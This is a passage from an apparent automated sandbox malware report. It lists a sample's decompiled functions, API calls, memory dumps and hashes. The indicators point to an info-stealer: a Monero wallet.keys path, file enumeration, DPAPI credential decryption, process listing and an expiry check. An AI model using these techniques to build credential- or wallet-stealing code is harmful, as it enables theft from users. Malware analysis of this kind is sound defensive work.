                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 9dd80a5f014729052c17c07fb88b9fe669442aecd14665f63842d86fa3705de8
                  • Instruction ID: 97c09a9611d25853f73fd6703234d308345ae334ee1c98267aa69b20c4711bc8
                  • Opcode Fuzzy Hash: 9dd80a5f014729052c17c07fb88b9fe669442aecd14665f63842d86fa3705de8
                  • Instruction Fuzzy Hash: F1417C71960218ABDB24DF94DC99BEEB778FF44740F2042D9E00A66281DB742F95CFA1
                  Function 006704F9 Relevance: 10.4, Strings: 7, Instructions: 1613COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !O$0b=$3]?7$4b=$7k=$yG$b>o
                  • API String ID: 0-215735701
                  • Opcode ID: 4991eb4f8c504ef3488725e5c0efb603c9be0bd74e1c08384901c5693590e7e7
                  • Instruction ID: c4cbad6dbcb72460c2edbc1465d5a1846588d1e2efa39da8af78abf8676b09a8
                  • Opcode Fuzzy Hash: 4991eb4f8c504ef3488725e5c0efb603c9be0bd74e1c08384901c5693590e7e7
                  • Instruction Fuzzy Hash: 5FB205F360C2049FE3046E29EC8567AFBE9EF94720F168A3DE6C4C7744EA3558058697
                  Function 002AE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,002C0D73), ref: 002AE4A2
                  • StrCmpCA.SHLWAPI(?,002C14F8), ref: 002AE4F2
                  • StrCmpCA.SHLWAPI(?,002C14FC), ref: 002AE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: e03e7eec867897458e484e0b5c4182b08a0f403b6f198ad8f4c0bd7243fbdd0a
                  • Instruction ID: 66545d11e749f3f397634dfcb53aff900c498a448600532cba33a44b097920ff
                  • Opcode Fuzzy Hash: e03e7eec867897458e484e0b5c4182b08a0f403b6f198ad8f4c0bd7243fbdd0a
                  • Instruction Fuzzy Hash: DB123471920114ABDB24FB60DCA7EED7378AF54340F4046A9B50B96492EF306F69CF92
                  Function 0067DBD1 Relevance: 9.0, Strings: 6, Instructions: 1497COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .g~y$1y_$5BW$qyfw${9'Y$xp|
                  • API String ID: 0-1380446244
                  • Opcode ID: 136654db9ec02e23c89b9af4cd7ed1619f58f2ed3ea160f5a0b70c200e1193b8
                  • Instruction ID: ed643d89f0a797e3ec6ced383b65b81b104cfaf7311fa2f0e43a4a06fc41a529
                  • Opcode Fuzzy Hash: 136654db9ec02e23c89b9af4cd7ed1619f58f2ed3ea160f5a0b70c200e1193b8
                  • Instruction Fuzzy Hash: B1A228F360C2049FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C3344EA7558458696
                  Function 002A9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,002A4EEE,00000000,?), ref: 002A9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9B2A
                  • LocalFree.KERNEL32(?,?,?,?,002A4EEE,00000000,?), ref: 002A9B3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID: N*
                  • API String ID: 4291131564-1366310849
                  • Opcode ID: 725557d9fe2476891983df011ab6b306747b9629ee33577fa15afcbba9ca4b85
                  • Instruction ID: c69be893b0032c0f497fdaa89ae16dcd522e3bdf8ea2c7168b7ba2aa4fd175dd
                  • Opcode Fuzzy Hash: 725557d9fe2476891983df011ab6b306747b9629ee33577fa15afcbba9ca4b85
                  • Instruction Fuzzy Hash: A611A2B4240208EFEB10CF64DC95FAA77B5FB8A704F208458F9159F390C7B6A951CBA4
                  Function 002AC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002AC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002AC87C
                  • lstrcat.KERNEL32(?,002C0B46), ref: 002AC943
                  • lstrcat.KERNEL32(?,002C0B47), ref: 002AC957
                  • lstrcat.KERNEL32(?,002C0B4E), ref: 002AC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 12db7cf31575b3b3bcf55e89901ae056a21cba2fd2a03945e543264bcc51005f
                  • Instruction ID: 2c4079097160325e04388cbbb038a22978511fa6e5b9dcdca0efb15968a91985
                  • Opcode Fuzzy Hash: 12db7cf31575b3b3bcf55e89901ae056a21cba2fd2a03945e543264bcc51005f
                  • Instruction Fuzzy Hash: CD418FB491421ADBCB10DFA0DD89BFEB7B8BF48304F1045B8F509A6280DB706A94CF91
                  Function 002B6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 002B696C
                  • sscanf.NTDLL ref: 002B6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002B69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002B69C0
                  • ExitProcess.KERNEL32 ref: 002B69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 17be921d9534aa2f3d44d8e1ef08095305c0918a500564adf394e6adfc77b946
                  • Instruction ID: b7c4595799283a36825be4d491b0a0a1838fd44a24ba483d353ec0dd88960e11
                  • Opcode Fuzzy Hash: 17be921d9534aa2f3d44d8e1ef08095305c0918a500564adf394e6adfc77b946
                  • Instruction Fuzzy Hash: 2B21DF75D14209ABCF04EFE4D9899EEB7B5FF48300F04452EE406E7251EB346619CB69
                  Function 002A7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002A724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002A7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002A72A4
                  • LocalFree.KERNEL32(?), ref: 002A72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 69cbf11a91af0f4e03e8d8f272b6179e04e6436d928e663f22e20336155cb7ad
                  • Instruction ID: 3445a68372080d54119307768aeead7354040b3bd5c0a53dbc3ef0f24a30f357
                  • Opcode Fuzzy Hash: 69cbf11a91af0f4e03e8d8f272b6179e04e6436d928e663f22e20336155cb7ad
                  • Instruction Fuzzy Hash: E10100B5A40208BBDB10DFD4CD89F9D7778FB44700F104554FB05AA2C1DAB0BA108B69
                  Function 002B9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002B961E
                  • Process32First.KERNEL32(002C0ACA,00000128), ref: 002B9632
                  • Process32Next.KERNEL32(002C0ACA,00000128), ref: 002B9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 002B965C
                  • CloseHandle.KERNEL32(002C0ACA), ref: 002B967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: addf61e814f5cd636c711db48e4e084b6bd385f02e421ac2154667fa58d1e0c2
                  • Instruction ID: b5f21fb8775353ba27e9ebbaf67ceba99335dfb1a6f4000ca1221a3338ecff2f
                  • Opcode Fuzzy Hash: addf61e814f5cd636c711db48e4e084b6bd385f02e421ac2154667fa58d1e0c2
                  • Instruction Fuzzy Hash: 05010CB5A10208ABDB14DFA5CD88BEDBBF8FB48340F104198E90996240D775ABA0CF51
                  Function 0066E95C Relevance: 6.6, Strings: 4, Instructions: 1635COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +~$>I<$RMn_$4k
                  • API String ID: 0-4273282719
                  • Opcode ID: 4e69542bcee9302a49e030a49b230a1ff7ee24de0f80c97f20f4fabef495efaa
                  • Instruction ID: c9ac09f21fc54bc6282e7e56d37139b1ade710b19cbc4c3f2f73d3dfa935a531
                  • Opcode Fuzzy Hash: 4e69542bcee9302a49e030a49b230a1ff7ee24de0f80c97f20f4fabef495efaa
                  • Instruction Fuzzy Hash: 37B205F3A0C3049FE3046E29EC8567AFBE5EF94720F168A3DE6C583744EA3558058697
                  Function 0067F4C3 Relevance: 6.6, Strings: 4, Instructions: 1632COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: -19o$.Sw$:Yw$A(}R
                  • API String ID: 0-139244064
                  • Opcode ID: 53e85c5d39cf2a42a60dcccbf949ff5546e45466ae79a7931828300e5839f522
                  • Instruction ID: 4aae8bf75a08ad5babaee7eac53760fa2692e5c479df3adc77fc1dcf24f8be3d
                  • Opcode Fuzzy Hash: 53e85c5d39cf2a42a60dcccbf949ff5546e45466ae79a7931828300e5839f522
                  • Instruction Fuzzy Hash: D3B2F6F36082049FE304AE2DEC8567AB7E9EF94720F16893DEAC4C3744E63598458797
                  Function 0067888A Relevance: 6.6, Strings: 4, Instructions: 1624COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
